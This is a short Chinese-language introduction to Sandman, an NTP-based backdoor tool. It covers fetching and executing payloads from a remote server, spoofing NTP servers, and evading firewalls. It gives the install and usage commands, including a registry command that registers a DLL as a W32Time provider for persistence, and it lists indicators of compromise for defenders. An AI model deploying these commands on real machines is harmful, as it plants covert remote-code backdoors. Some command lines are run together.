关于Sandman 

 功能介绍 

1、允许从研究人员控制的服务器获取并执行任意Payload；

2、由于网络防火墙系统中通常会允许使用NTP协议，因此可以将其用于安全增强型网络系统中；

3、支持通过IP欺骗技术来模拟合法的NTP服务器；

 工具安装 

git clone https://github.com/Idov31/Sandman.git

(向右滑动、查看更多)

SandmanServer

cd Sandmanpip3 install requirements.txt

SandmanBackdoor

SandmanBackdoorTimeProvider

 工具使用 

SandmanServer使用

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
(向右滑动、查看更多)

SandmanBackdoor使用

SandmanBackdoorTimeProvider使用

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"

sc stop w32timesc start w32time

 工具运行截图 

 入侵威胁指标IoC 

1、工具会将一个Shellcode注入到RuntimeBroker中；

2、NTP通信会使用可疑的Header；

3、可以使用YARA规则检测；

 许可证协议 

 项目地址 

参考资料：

https://github.com/ORCx41/

https://twitter.com/NotMedic

https://twitter.com/NotMedic/status/1561354598744473601

https://github.com/3F/DllExport